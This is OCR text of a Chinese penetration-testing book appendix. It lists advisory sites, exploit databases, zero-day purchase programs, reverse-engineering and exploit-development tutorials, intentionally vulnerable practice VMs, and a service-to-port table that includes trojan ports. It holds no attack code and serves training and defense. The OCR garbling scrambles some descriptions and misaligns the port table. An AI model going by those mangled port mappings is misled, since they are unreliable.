http://www.vupen.com/ 安全 公告 、PoC、 邮 件 列 表 和 研究 类 期 刊 





续 表 


URL 


http: //www.secunia.com/ 
http: //www.exploit-db.com/ 


http: //web.nvd.nist.gov/view/vuln/search 
https://access.redhat.com/ 
security/updates/advisory/ 
http://lists.centos.org/ 
pipermail/centos-announce/ 


http://www.us-cert.gov/ncas/alerts 


http://xforce.iss.net 


http://www.debian.org/security/ 


http://www.mandriva.com/en/support/ 
security/ 


https://www.suse.com/support/update/ 


http://technet.microsoft.com/en-us/ 
security/advisory 


http://technet.microsoft.com/en-us/ 
security/bulletin 


http://www.ubuntu.com/usn 
http://www.first.org/cvss/ 


http://tools.cisco.com/security/center 
/publicationListing.x 


http://www.security-database.com 


http://www.securitytracker.com/ 
http://www.auscert.org.au/ 


http://en.securitylab.ru/ 
http://corelabs.coresecurity.com/ 
https://www.htbridge.com/ 
http://www.offensivecomputing.net/ 


http://measurablesecurity. 
mitre.org/ 


B1.1 奖励 计划 


~ 


描述 
公告 、 和 白皮书 、 安 全 情况 介绍 和 研究 论文 
exploit 数据 库 、Google Hacking Database (GHDB) 
和 论文 
NVD 是 美国 政府 使 用 的 基于 CVE 的 漏洞 数据 库 


RedHat 勘误 通知 和 安全 建议 

CentOS 的 安全 公告 列表 和 常规 公公 开 邮 件 列表 服务 
美国 国土 安全 部 US-CERT 刊登 安全 问题 、 安 全 漏 
洞 和 exploit 的 技术 公告 的 网 站 

ISS X-Force 提供 威胁 警报 、 安 全 公告 、 漏 洞 库 和 
白皮书 的 资料 

Debian 安全 公告 和 邮件 列表 


Mandriva Linux 安全 公告 


SUSE Linux Enterprise 安全 公告 
微软 安全 公告 
微软 安全 通报 


Ubuntu 的 安全 道 知 
First Common Vulnerability Scoring System(CVSS-SIG ) 


思科 的 安全 公告 、 响 应 和 通知 


安全 警报 、 仪 表 板 和 CVSS 的 计算 器 

安全 漏洞 信息 

澳大利亚 CERT 刊登 安全 通告 、 公 告 、 警 告 、 演 
示 文 稿 和 论文 的 网 站 

公告 、 漏 洞 数据 库 、PoC 和 病毒 专题 报告 

漏洞 研究 、 出 版 物 、 安 全 公告 和 安全 工具 

安全 公告 及 安全 出 版 物 

恶意 代码 样本 仓库 

MITRE 提供 了 可 用 于 脆弱 性 管理 、 入 侵 检测 、 安 全 
的 资产 评估 、 资 产 管理 、 配 置 指导 、 补 丁 管理 、 恶 意 
软件 响应 、 事 件 管理 和 威胁 分 析 的 业内 交流 标准 协 
议 。 人 们 常 说 的 CVE、CWE、CAPEC 和 CCE 都 属 
于 这 种 协议 


部 分 公司 公开 收购 zero-day exploit 程序 。 


URL 描述 


http://www. zerodayinitiative.com/ 3Com/TippingPoint 的 Zero-Day Initiative 计划 


http: //www.netragard.com/zero- 


JA - i 
day-exploit-acquisition-program Netagard 收购 Zero-day exploits 


A ARER ee EE ET ee ENEN iSIGHT partners 的 GVP (Global Vulnerability Partnership ) 





计划 
https://exploithub.com 漏洞 测试 的 交易 市 场 
http://www.beyondsecurity.com/ SecuriTeam 的 安全 披露 计划 ， 可 为 汇报 漏洞 的 研究 人 
ssd.html 员 提 供 奖金 


B.2 逆向 工程 资源 
在 研究 逆向 工程 技术 时 ， 您 可 能 需要 参考 以 下 资料 。 





URL 
http: //www.woodmann.com/forum/ 
index.php 
http: //www.binary-auditing.com/ 
http://www.openrce.org/ 
http://reversingproject.info/ 


http://www.reteam.org/ 


http://www.exetools.com/ 
http://tuts4you.com/ 
http://crackmes.de/ 
http://fumalwareanalysis. 


blogspot.com/p/malware-analysis-tuto 
rials-reverse.html 


http://quequero.org/ 


B.3 渗透 测试 学 习 资 源 


描述 
逆向 工程 论 ， 它 整理 了 各 种 知识 ， 并 介绍 了 各 种 工具 


使 用 IDA Pro 进行 可 执行 程序 审计 的 免费 培训 资料 
开放 的 逆向 工程 社区 

提供 学 习 软 件 逆向 工程 所 需 的 工具 、 文 件 和 练习 题目 
这 个 逆向 工程 团队 分 享 了 大 量 项 目 、 论 文 、 练 习题 和 
工具 

教程 、 文 件 分 析 工 具 、 压 缩 工具 、 十 六 进 制 编辑 器 、 
保护 程序 、 解 包 程序 、 调 试 器 、 反 汇编 工具 、 补 丁 '…… 
逆向 工程 的 教程 和 工具 

读者 可 在 完成 这 个 网 站 的 作业 《也 就 是 常 说 的 crackme) 的 
同时 ， 测 试 、 提 高 自身 的 逆向 工程 水 平 

恶意 软件 分 析 教 程 。 它 使 用 逆向 工程 的 手段 进行 代码 
分 析 

UIC R.E. 只 在 于 向 所 有 希望 学 习 逆 向 工程 的 人 士 免 费 
进行 教学 。 这 个 网 站 分 享 了 恶意 代码 分 析 文 章 ， 以 及 
几 款 逆向 工程 工具 


如 果 您 需要 深入 地 学 习 渗 透 测试 领域 的 有 关 知 识 ， 那 么 可 以 参考 以 


下 资源 。 


URL 
http://www.kali.org/blog/ 


http://pen-testing.sans.org 


http://resources.Infosecinstitute. 
com/ 


http://www.securitytube.net/ 


http: //www.concise-courses.com/ 


http://opensecuritytraining.info/ 
Training.html 


https://pentesterlab.com/bootcamp/ 


http://www.pentesteracademy.com/ 


http://www.pentest-standard.Org 


http://www.ethicalhacker.net/ 
https://community.rapid7.com/ 
community/metasploit/blog 
http://www.blackhatlibrary.net/ 
Main Page 
http://www.offensive-security. 
com/metasploit-unleashed/Main Page 
http://www.codecademy.com/learn 
http://www.social-engineer. 
org/framework/Computer Based 
Social Engineering Tools: Social 
Engineer Toolkit $28SET$29 





描述 
Kali Linux 的 博客 
SANS 提供 的 渗透 测试 资源 : 博客、 白皮书 、 网 络 视 
频 、 笔 记 小 抄 ， 以 及 各 种 技术 链接 
收录 了 大 量 信息 安全 的 技术 文章 ， 其 内 容 涉及 破解 道 
向 工程 、 法 证 调查 、 应 用 安全 等 
这 个 网 站 有 很 多 信息 安全 的 教学 视频 ， 它 的 大 部 分 视频 
讲解 得 都 很 深入 ， 较 为 著名 教程 的 有 Metasploit 框架 、 
WiFi 安全 、exploit 研究 等 教程 
这 个 网 站 有 很 多 信息 安全 方面 的 在 线 课 程 ， 部 分 课程 
是 收费 课程 
这 个 网 站 上 分 享 了 很 多 计算 机 安全 课程 的 培训 资料 。 它 几 
平 涵盖 了 信息 安全 的 所 有 课题 ， 而 且 每 个 课题 的 教学 资料 
足以 满足 一 整 天 的 培训 需求 
如 果 您 还 不 了 解 如 何 成 为 专业 的 渗透 测试 人 员 ， 那 么 这 
个 网 站 就 适合 您 参考 了 。 需 要 15 周 的 集中 培训 时 间 ， 才 
能 讲解 完 它 的 全 部 教学 资料 。 它 的 内 容 可 分 为 自学 资料 
和 上 手 练习 两 个 部 分 
在 线 培训 信息 安全 的 网 站 。 它 涉及 Web 应 用 程序 渗 
透 、 网 络 渗透 等 课题 。 部 分 视频 可 免费 下 载 ， 换 句 话 
说 ， 只 有 会 员 才 能 下 载 其 他 视频 
“渗透 测试 执行 标准 ”在 渗透 测试 技术 领域 的 新 兴 新 
标准 ， 它 使 用 业务 和 安全 技术 通用 的 语言 重新 对 渗透 
测试 进行 定义 ， 并 使 用 这 种 语言 阐述 了 渗透 测试 的 过 
程 和 标准 
面向 信息 安全 专业 人 士 的 免费 网 络 杂 志 


Metasploit 的 博客 
关注 安全 教程 和 安全 工具 的 网 站 
网 站 提供 Metasploit 框架 的 免费 教学 资料 


SET (Social Engineering Toolkit) 的 学 习 资 料 


续 表 


URL 描述 
http://technet.microsoft.com/en-us 
/library/cc754340%28WS.10%29.aspx 





Windows Server 指令 行 命令 的 参考 资料 
eLearnSecurity 是 IT 安全 服务 的 提供 商 。 他 们 也 向 IT 
专业 人 士 提供 渗透 测试 的 培训 课程 

Kali Linux 的 开发 团队 。 他 们 提供 IT 安全 培训 服务 和 
资格 认证 服务 


渗透 测试 的 Python 工具 


http://www.elearnsecurity.com/ 


http://www.offensive-security.com/ 


http://www.dirk-loss.de/ 
python-tools.htm 


B.4 Exploit 研 发 资源 
在 学 习 exploit 的 研发 技术 时 ， 可 参考 以 下 资源 。 


URL 描述 
https://www.corelan.be/index.php/a 这 个 网 站 收录 了 很 多 信息 安全 的 文章 。 它 以 详尽 的 
rticles/ exploit 编程 自学 资料 而 闻名 


http://fuzzysecurity.com/ 


eT Wi i 23H it 研发 教程 
ee 提供 了 Windows 和 Linux 系统 的 exploit 研发 教程 


不 仅 分 享 了 exploit 研发 教程 , 而 且 还 提供 了 有 缺陷 的 
服务 端 程 序 供 读 者 练习 





http://www.thegreycorner.com/ 





B.5 测试 资源 

本 节 将 介绍 一 些 可 进行 在 线 练习 的 Web 应 用 程序 练习 题 ， 以 及 下 载 
后 再 做 离线 练习 的 虚拟 机 镜像 和 ISO 镜像 。 读 者 可 利用 这 些 资源 ， 在 自 
己 的 系统 环境 中 学 习 渗 透 测 试 的 技术 。 

B.5.1 在 线 渗透 练习 

很 多 网 站 都 提供 了 渗透 测试 的 练习 题目 。 读 者 可 利用 这 些 网 站 进行 
在 线 练习 。 


URL 描述 


https://pentesteracademylab. 如 果 要 练习 form 的 暴力 破解 和 HTTP basic 认证 的 攻 
appspot.com/ 击 方法 ， 可 试 一 下 这 个 网 站 提供 的 4 道 免费 练习 题 
Hack.me 是 由 eLearnSecurity 支持 的 免费 项 目 ， 由 其 社 
diesen x! e 区 团队 集体 研发 。 在 教育 和 研究 的 范畴 之 内 ， 加 入 社 
区 的 人 员 可 以 组 建 (build)、 搭 建 (host)、 分 享有 安全 
缺陷 的 Web 程序 代码 








续 表 


URL 描述 
读者 可 在 Hacking-Lab 的 安全 实验 室 ( 网 站 ) 里 练习 


IER CUE CORAL UNUS Be 各 种 题目 。 他 们 甚至 单独 改行 了 可 远程 访问 安全 实验 


ale z 
aai 室 的 Live CD 
https://google-gruyere. 这 个 网 站 讲解 了 Web 应 用 程序 的 攻防 技术 ， 并 提供 了 
appspot.com/ 有 关 的 练习 题目 


Enigma Group 在 这 个 网 站 上 提供 大 量 练习 题 、 以 供 其 
成 员 练习 各 种 测试 技术 。 它 的 题目 不 仅 涵 盖 了 OWASP 
http://www.enigmagroup.org/ 排名 前 10 的 安全 问题 , 而 且 涵 盖 了 最 近 出 现 的 程序 漏 
洞 ， 可 在 帮助 其 成 员 练习 入 侵 技 术 的 同时 、 指 导 他 们 
以 更 为 安全 的 方式 编写 程序 
OWASP Hackademic Challenges Project 是 一 个 供 人 测 
iX Web 应 用 程序 安全 技术 的 开放 源 代码 项 目 。 它 采用 
DRallebses Beater lE 您 可 以 使 用 真实 的 入 侵 技 
$ CBR X 
Hack This Site 是 一 个 免费 、 安 全 、 合 法 的 入 侵 技术 练 
习 平 台 。 读 者 可 通过 它 测试 、 学 习 入 侵 技 巧 。 这 个 网 
站 有 大 量 的 技术 文章 ， 并 且 还 有 一 个 讨论 技术 、 网 络 
安全 的 大 型 论坛 


https://www.owasp.org/index. 
php/OWASP Hackademic 


https://www.hackthissite.org/ 


B.5.2 虚拟 机 及 ISO 镜像 

在 研究 渗透 测试 时 ， 您 可 以 在 虚拟 机 里 安装 各 种 虚拟 机 和 ISO 镜像 
进行 模拟 练习 。 作 者 向 您 推荐 以 下 几 个 离线 练习 对 象 。 

URL 描述 

它 提供 了 多 种 虚拟 机 ， 可 用 于 数字 安全 、 应 用 程序 和 网 
络 管理 的 相关 练习 
这 个 网 站 不 仅 提 供 了 大 量 的 虚拟 机 ， 而 且 还 有 计算 机 
http://exploit- 安全 方面 的 教程 和 练习 题 。 这 些 资料 可 用 于 权限 提升 、 
exercises.com/ 漏洞 分 析 、 开 发 exploit、 程 序 调 试 、 逆 向 工 程 和 常规 
安全 范畴 的 上 手 练习 
这 个 网 站 分 享 了 Web 应 用 程序 安全 方面 的 课题 资料 。 
这 些 资料 涵盖 了 SQL 注入 、Axis2、Tomcat 管理 器 、 
MoinMoin 代码 执行 等 课题 。 在 它 的 ISO 镜像 里 ， 您 可 





http://vulnhub.com/ 


https://www. 
pentesterlab.com/ 


ariii 以 找到 每 种 课题 的 详细 教程 ， 以 及 含有 漏洞 的 应 用 程序 

Hackxor 是 一 款 Web 应 用 程序 的 入 侵 游戏 。 玩 家 必须 找 
http://hackxor. 到 并 利用 有 关 漏 洞 ， 才 能 推动 游戏 故事 的 情节 发 展 。 它 
sourceforge.net 帮助 读者 练习 XSS. CSRF. SQLi. ReDoS. DOR. fij 


令 注射 等 技术 
续 表 


URL 


https://www.mavensecurity.com/web 
security dojo/ 


http://www.bonsai-sec.com/en/rese 
arch/moth.php 


http://exploit.co.il/projects/ 
vuln-web-app/ 


http://sourceforge.net/projects/ 
lampsecurity/ 


https://bechtsoudis.com/work-stuff/ 
challenges/drunk-admin-web-hacking- 
challenge/ 


https://code.google.com/p/owaspbwa/ 


http://sourceforge.net/projects/ 
bwapp/files/bee-box/ 


http://information.rapid7.com/ 
download-metasploitable.html?LS 
=1631875&CS=web 


B.6 网 络 端口 


描述 
Web Security Dojo 是 一 个 开源 的 独立 训练 环境 ， 可 用 于 
Web 应 用 程序 的 安全 研究 和 渗透 测试 的 练习 
Moth 是 一 个 载 有 不 安全 的 Web 应 用 程序 和 Web 脚本 的 
VMware 虚拟 机 镜像 。 它 可 用 于 : 
e 评估 Web 应 用 程序 安全 扫 瞄 器 
e 测试 SCA (Static Code Analysis) 工具 
作为 Web 应 用 程序 导论 的 资料 
jx Web 应 用 程序 是 练习 各 种 SQL 注入 技术 的 学 习 平 
全 。 它 实际 上 是 一 个 基于 fckeditor 的 功能 完备 的 CMS( 内 
管理 系统 ) 
LAMP Security training 项 目 发 布 了 一 系列 的 、 带 有 安全 漏洞 
的 虚拟 机 镜像 。 其 中 的 各 种 说 明 材 料 可 用 于 Linux、Apache、 
PHP, MySQL 的 安全 教学 
可 这 个 练习 题 的 虚拟 机 镜像 ， 是 一 个 运行 着 多 种 设计 
缺陷 的 Web 服务 器 。 您 必须 枚 举 出 Web 服务 的 各 种 功 
能 ， 并 找到 被 利用 的 安全 漏洞 ， 才 能 解答 题目 一 一 读 
取 系 统 中 的 隐藏 文件 
OWASP Broken Web Applications Project 发 布 的 虚拟 机 
镜像 采用 了 Vmware 兼容 的 镜像 格式 。 这 个 虚拟 机 里 
封装 了 多 个 存在 安全 问题 的 Web 应 用 程序 
bee-box 是 一 个 预 装 有 bWAPP 程序 的 Linux VMware 
忠 拟 机 。 您 可 以 通过 多 种 方式 黑 掉 、 毁 掉 bWAPP 的 
网 站 程序 ， 其 至 可 能 获取 服务 器 的 root 权限 。 总 之 ， 
它 是 一 个 挖掘 bWAPP 漏洞 的 测试 平台 
Metasploitable 2 虚拟 机 搭载 着 一 个 被 故意 设计 得 漏洞 
百出 的 Ubuntu Linux 系统 。 它 旨 在 满足 测试 安全 工具 
和 演示 常规 漏洞 的 技术 需求 
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排查 网 络 设备 上 的 关键 漏洞 这 种 事情 既 费 时 又 费力 。 为 了 便于 读者 
使 用 Kali Linux 工具 快速 地 检索 可 能 存在 弱点 的 网 络 服务 ， 本 文 把 常见 
的 网 络 服 务 及 其 占用 的 端口 号 码 整 理 了 出 来 。 

如 需 获 取 更 为 全 面 的 最 新 的 网 络 端口 分 配 表 ， 请 参见 
http://www.iana.org/assignments/port-numbers 。 

需要 注意 的 是 ， 程 序 不 一 定 总 是 占用 默认 的 端口 。 只 要 进行 相应 调 
整 ， 多 数 程序 就 可 以 占用 其 他 的 TCP/P 端 口 。 


服务 名 称 
Echo 
Character Generator (CHARGEN) 
FTP data transfer 
FTP control 
SSH 
Telnet 
SMTP 
WHOIS 
TACACS 
DNS 
Bootstrap Protocol (BOOTP) server 
Bootstrap Protocol (BOOTP) client 
TFTP 
HTTP 
Kerberos 
POP3 
SunRPC 
NTP 
NetBIOS (Name service) 
NetBIOS (Datagram service) 
NetBIOS (Session service) 
IMAP 
SNMP 
SNMPTRAP 
BGP 
IRC 
BGMP 
LDAP 
HTTPS 
Microsoft DS 
ISAKMP 


rexec 


通信 协议 


TCP/UDP 
TCP/UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP/UDP 
UDP 


TCP 

TCP/UDP 
UDP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP 

UDP 

TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP 
TCP/UDP 
TCP/UDP 
TCP 











续 表 


服务 名 称 


rlogin 

Who 

rsh 

Syslog 

Talk 

RIP/RIPv2 

Timed 

klogin 

MacOS XSever Administration 
Spamassassin 

rsync 

IMAPS 

POP3S 

SOCKS 

Nessus 

IBM Lotus Notes 
Timbuktu-srv1 
MSSQL 

Citrix 

Oracle default listener 


Ingres 


Oracle common alternative for listener 


PPTP 

radius 

Cisco SCCP 
NFS 


OpenView network node manager daemon 


Microsoft Global Catalog 
MySQL 
Microsoft Terminal Service 


NFS-lockd 


l- 

E 
1 
qj 





1417-1420 
1433 
1494 
1521 
1524 
1526 
1723 
1812 
2000 
2049 
2447 
3268 
3306 
3389 
4045 


通信 协议 


TCP 
UDP 
TCP 
UDP 
TCP/UDP 
UDP 
UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP 
TCP/UDP 
TCP/UDP 
TCP/UDP 
TCP 
TCP/UDP 
TCP/UDP 
TCP 
TCP 
TCP 





续 表 


服务 名 称 
SIP 
Multicast DNS 
PostgreSQL 
PCAnywhere 
VNC 
X11 
ArcServe 
BackupExec 
Gnutella 
Gnutella alternate 
IRC 
Web 
Privoxy 
Polipo 
Cisco-xremote 
Jetdirect 
Netbus 
Quake 
Back Orifice 


6665~6670 
8080 

8118 

8123 

9001 

9100 
12345 
27960 
31:397 


通信 协议 
TCP/UDP 
UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP/UDP 
TCP/UDP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
UDP 
UDP 


